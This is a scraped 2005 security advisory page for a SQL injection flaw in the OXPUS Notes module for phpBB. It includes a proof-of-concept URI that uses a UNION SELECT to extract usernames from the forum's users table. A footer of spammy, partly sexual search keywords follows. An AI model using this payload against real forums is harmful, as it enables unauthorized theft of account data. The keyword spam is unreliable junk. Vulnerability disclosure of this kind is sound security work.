about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Notes Module for PHPBB SQL Injection Vulnerability


Title Notes Module for PHPBB SQL Injection Vulnerability
Published 2005-04-28-12:00AM
Updated 2005-05-10-03:03PM
Class Input Validation Error
CVE   CAN-2005-1378
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team is credited with the discovery of this vulnerability.
Vulnerable  OXPUS.de Notes mod
Not Vulnerable  OXPUS.de Notes mod 1.4.7
Code   No exploit is required.

The following proof of concept URI is available:
http://www.example.com/posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 04:46:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
dogxxx mambo Remo guest book WWW.MEMEK Www.89sex. SANIASEX LIVE JASMI bangla sex mysmiles /search/ex t965t news for c color prof sexy pichu Hinata bug apache 1.3 apache 5.0 200 /compo shoutbox 2 Malavikase global ann Saxi girls xviedeos.c mandriva Apache/ Sex 18 Yea t223t sexy south 200 /compo www.520qqq Www.school Nametha to Sonia euse.cn local 2.6. I agree wi Exploits S joomla exp Adios Ladyboy www.123 yourporn.c front pag WWW.BBC UR mambo Remo front pag WWW.Trisha t503t WWW.BBC UR OWLLib